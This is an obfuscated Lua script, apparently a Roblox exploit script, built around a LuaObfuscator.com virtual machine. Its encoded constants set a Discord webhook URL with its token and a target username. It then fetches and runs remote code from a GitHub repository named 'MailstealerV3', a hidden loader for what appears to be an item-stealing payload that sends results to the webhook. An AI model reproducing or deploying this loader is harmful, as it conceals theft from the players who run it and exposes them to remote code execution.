--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v71=v2(v0(v30,16));if v19 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v71,v19);v19=nil;v79=1;end end else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/(2^(v32-1)))%((5 -3)^(((v33-((879 -(282 + 595)) -1)) -(v32-(1 -0))) + (2 -1))) ;return v72-(v72%1) ;else local v73=619 -(555 + 64) ;local v74;while true do if (v73==(931 -(857 + 74))) then v74=(570 -(367 + (1838 -(1523 + 114))))^(v32-(928 -(214 + 641 + 72))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (0 + (0 -0)) ;end end end end local function v21()local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==((957 -(892 + 65)) + 0)) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(2 -1) + (0 -0) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(351 -((345 -258) + 263))) then return (v38 * (436 -(67 + 113))) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;v36=1 + 0 ;end end end local function v23()local v39=952 -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * 16777216) + (v42 * (118879 -(70153 -16810))) + (v41 * (187 + 69)) + v40 ;end if (((2184 -(1069 + 118)) -(915 + 82))==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;v39=1;end end end local function v24()local v44=v23();local v45=v23();local v46=2 -1 ;local v47=(v20(v45,1,43 -(14 + 9) ) * ((1 + (3 -2))^(56 -24))) + v44 ;local v48=v20(v45,21 + 0 ,(2918 -2096) -(368 + 423) );local v49=((v20(v45,100 -68 )==1) and  -(19 -(10 + 8))) or (3 -2) ;if (v48==(442 -(416 + 26))) then if (v47==((859 -(814 + 45)) -0)) then return v49 * (0 + 0) ;else local v81=0 -0 ;while true do if (v81==(438 -(145 + 293))) then v48=431 -(44 + 386) ;v46=1486 -(998 + 488) ;break;end end end elseif (v48==2047) then return ((v47==((0 -0) + 0)) and (v49 * ((1 + 0 + 0)/(772 -(201 + 571))))) or (v49 * NaN) ;end return v8(v49,v48-((764 + 1397) -(116 + 1022)) ) * (v46 + (v47/(2^(216 -164)))) ;end local function v25(v50)local v51;if  not v50 then local v75=(4190 -3305) -(261 + 624) ;while true do if (v75==((0 + 0) -(0 -0))) then v50=v23();if (v50==(1080 -(1020 + 60))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1424 -(630 + 793)) );v18=v18 + v50 ;local v52={};for v69=(1750 -(760 + 987)) -2 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=0) then else v54=0;v55=nil;v53=1;end if (v53~=(2 -0)) then else v58=nil;v59=nil;v53=344 -(218 + 123) ;end if (v53==(1582 -(1535 + 46))) then v56=nil;v57=nil;v53=2 + 0 ;end if (v53~=4) then else while true do if (v54==2) then v59=nil;v60=nil;v54=3;end if (v54~=(1 + 0)) then else v57=nil;v58=nil;v54=562 -(306 + 254) ;end if (v54~=3) then else v61=nil;while true do if (v55==0) then local v105=0;while true do if ((0 + 0)==v105) then v56={};v57={};v105=1 -0 ;end if (v105==1) then v58={};v59={v56,v57,nil,v58};v105=605 -(268 + 335) ;end if (v105~=2) then else v55=1;break;end end end if (v55==(291 -(60 + 230))) then local v106=0;while true do if (v106==(572 -(426 + 146))) then local v109=0 + 0 ;while true do if ((1456 -(282 + 1174))==v109) then v60=v23();v61={};v109=1;end if (v109==(812 -(569 + 242))) then v106=2 -1 ;break;end end end if (v106~=1) then else for v111=1,v60 do local v112=0;local v113;local v114;local v115;local v116;while true do if (1==v112) then v115=nil;v116=nil;v112=1 + 1 ;end if (v112==0) then v113=0;v114=nil;v112=1025 -(706 + 318) ;end if (v112~=(1253 -(721 + 530))) then else while true do if (v113==(1271 -(945 + 326))) then v114=0 -0 ;v115=nil;v113=1;end if (1==v113) then v116=nil;while true do if (0~=v114) then else local v181=0 + 0 ;local v182;while true do if (v181==0) then v182=700 -(271 + 429) ;while true do if ((0 + 0)==v182) then local v189=0;while true do if (v189~=(1501 -(1408 + 92))) then else v182=1087 -(461 + 625) ;break;end if (v189==0) then v115=v21();v116=nil;v189=1;end end end if (v182~=(1289 -(993 + 295))) then else v114=1 + 0 ;break;end end break;end end end if (v114==1) then if (v115==1) then v116=v21()~=(1171 -(418 + 753)) ;elseif (v115==(1 + 1)) then v116=v24();elseif (v115==3) then v116=v25();end v61[v111]=v116;break;end end break;end end break;end end end v59[1 + 2 ]=v21();v106=1 + 1 ;end if (v106==2) then v55=2;break;end end end if (v55==2) then local v107=0 + 0 ;local v108;while true do if ((529 -(406 + 123))==v107) then v108=0;while true do if ((1770 -(1749 + 20))==v108) then return v59;end if (v108==0) then local v123=0 + 0 ;while true do if (v123~=1) then else v108=1323 -(1249 + 73) ;break;end if (v123==0) then for v146=1,v23() do local v147=0;local v148;local v149;while true do if (0==v147) then v148=0 + 0 ;v149=nil;v147=1146 -(466 + 679) ;end if (v147==(2 -1)) then while true do if (v148~=(0 -0)) then else v149=v21();if (v20(v149,1901 -(106 + 1794) ,1 + 0 )==0) then local v184=0 + 0 ;local v185;local v186;local v187;local v188;while true do if (v184==0) then local v190=0 -0 ;while true do if (v190==(2 -1)) then v184=115 -(4 + 110) ;break;end if (v190==0) then local v192=584 -(57 + 527) ;while true do if (1==v192) then v190=1428 -(41 + 1386) ;break;end if (v192~=0) then else v185=0;v186=nil;v192=1;end end end end end if (1==v184) then local v191=103 -(17 + 86) ;while true do if (v191~=(0 + 0)) then else v187=nil;v188=nil;v191=1;end if (v191~=1) then else v184=2;break;end end end if (v184==(3 -1)) then while true do if (v185==(2 -1)) then local v193=0;local v194;local v195;while true do if (v193~=(166 -(122 + 44))) then else v194=0;v195=nil;v193=1;end if (v193==(1 -0)) then while true do if (v194==(0 -0)) then v195=0;while true do if (v195==1) then v185=2 + 0 ;break;end if (v195==0) then v188={v22(),v22(),nil,nil};if (v186==(0 + 0)) then local v206=1257 -(1043 + 214) ;local v207;local v208;local v209;while true do if ((0 -0)==v206) then v207=0;v208=nil;v206=1;end if (v206~=1) then else v209=nil;while true do if (v207~=0) then else local v216=1212 -(323 + 889) ;while true do if (v216==0) then v208=0;v209=nil;v216=2 -1 ;end if (v216==(581 -(361 + 219))) then v207=1;break;end end end if (1~=v207) then else while true do if (v208==(320 -(53 + 267))) then v209=0;while true do if (v209~=(0 + 0)) then else v188[3]=v22();v188[417 -(15 + 398) ]=v22();break;end end break;end end break;end end break;end end elseif (v186==1) then v188[985 -(18 + 964) ]=v23();elseif (v186==(7 -5)) then v188[3]=v23() -(2^(10 + 6)) ;elseif (v186~=(2 + 1)) then else local v217=850 -(20 + 830) ;local v218;local v219;while true do if (v217==(1 + 0)) then while true do if (v218~=(126 -(116 + 10))) then else v219=0 + 0 ;while true do if (v219==(738 -(542 + 196))) then v188[3]=v23() -(2^(34 -18)) ;v188[2 + 2 ]=v22();break;end end break;end end break;end if (v217==(0 + 0)) then v218=0;v219=nil;v217=1;end end end v195=1;end end break;end end break;end end end if (v185~=2) then else local v196=0 + 0 ;while true do if (v196~=0) then else local v201=0;local v202;while true do if (0==v201) then v202=0;while true do if (v202==(0 -0)) then local v205=0;while true do if (v205==(2 -1)) then v202=1552 -(1126 + 425) ;break;end if (v205==(405 -(118 + 287))) then if (v20(v187,1,3 -2 )~=1) then else v188[1123 -(118 + 1003) ]=v61[v188[5 -3 ]];end if (v20(v187,379 -(142 + 235) ,9 -7 )==(1 + 0)) then v188[3]=v61[v188[3]];end v205=978 -(553 + 424) ;end end end if (v202==(1 -0)) then v196=1 + 0 ;break;end end break;end end end if (v196==(1 + 0)) then v185=2 + 1 ;break;end end end if (0==v185) then local v197=0;while true do if (v197==0) then local v203=0;while true do if (v203==0) then local v204=0 + 0 ;while true do if (v204~=1) then else v203=1 + 0 ;break;end if (v204==(0 -0)) then v186=v20(v149,2,7 -4 );v187=v20(v149,4,6);v204=1;end end end if (1==v203) then v197=1;break;end end end if (1==v197) then v185=1;break;end end end if (v185~=3) then else if (v20(v187,6 -3 ,3)==1) then v188[4]=v61[v188[4]];end v56[v146]=v188;break;end end break;end end end break;end end break;end end end for v150=1 + 0 ,v23() do v57[v150-(4 -3) ]=v28();end v123=1;end end end end break;end end end end break;end if (v54~=(753 -(239 + 514))) then else local v98=0 + 0 ;while true do if (v98==0) then v55=1329 -(797 + 532) ;v56=nil;v98=1;end if (1==v98) then v54=1 + 0 ;break;end end end end break;end if (v53==(2 + 1)) then v60=nil;v61=nil;v53=9 -5 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v82=v66;local v83=v67;local v84=v68;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=4) then if (v95<=1) then if (v95==0) then v92[v94[2]]=v94[3]~=0 ;else v92[v94[2]]=v94[3];end elseif (v95<=2) then v92[v94[2]]();elseif (v95>3) then v64[v94[3]]=v92[v94[2]];else local v126=0;local v127;local v128;while true do if (v126==0) then v127=nil;v128=nil;v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v64[v94[3]]=v92[v94[2]];v126=1;end if (v126==2) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3]~=0 ;v86=v86 + 1 ;v94=v82[v86];v64[v94[3]]=v92[v94[2]];v126=3;end if (3==v126) then v86=v86 + 1 ;v94=v82[v86];if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v64;else v92[v94[2]]=v64[v94[3]];end v86=v86 + 1 ;v94=v82[v86];if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v64;else v92[v94[2]]=v64[v94[3]];end v126=4;end if (5==v126) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];break;end if (v126==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v94=v82[v86];v64[v94[3]]=v92[v94[2]];v126=2;end if (v126==4) then v86=v86 + 1 ;v94=v82[v86];v128=v94[2];v127=v92[v94[3]];v92[v128 + 1 ]=v127;v92[v128]=v127[v94[4]];v126=5;end end end elseif (v95<=6) then if (v95>5) then do return;end elseif ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v64;else v92[v94[2]]=v64[v94[3]];end elseif (v95<=7) then local v120=0;local v121;local v122;while true do if (v120==1) then v92[v121 + 1 ]=v122;v92[v121]=v122[v94[4]];break;end if (v120==0) then v121=v94[2];v122=v92[v94[3]];v120=1;end end elseif (v95>8) then local v132=0;local v133;while true do if (v132==0) then v133=v94[2];v92[v133]=v92[v133](v13(v92,v133 + 1 ,v87));break;end end else local v134=v94[2];local v135,v136=v85(v92[v134](v13(v92,v134 + 1 ,v94[3])));v87=(v136 + v134) -1 ;local v137=0;for v143=v134,v87 do v137=v137 + 1 ;v92[v143]=v135[v137];end end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D6503123O00556365744A656E4B76756C695368696E793203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O393039333138333835303734313831302F59314B65503558764168324169504D393079687A38374E313270695044736B704D32767754326F313949344A43534C71397062534C50496C704D444B314A6165444F7748030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E000E3O0012033O00023O00124O00013O00124O00043O00124O00038O00013O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0008000100034O00095O00022O00023O000100012O00063O00017O00",v9(),...);
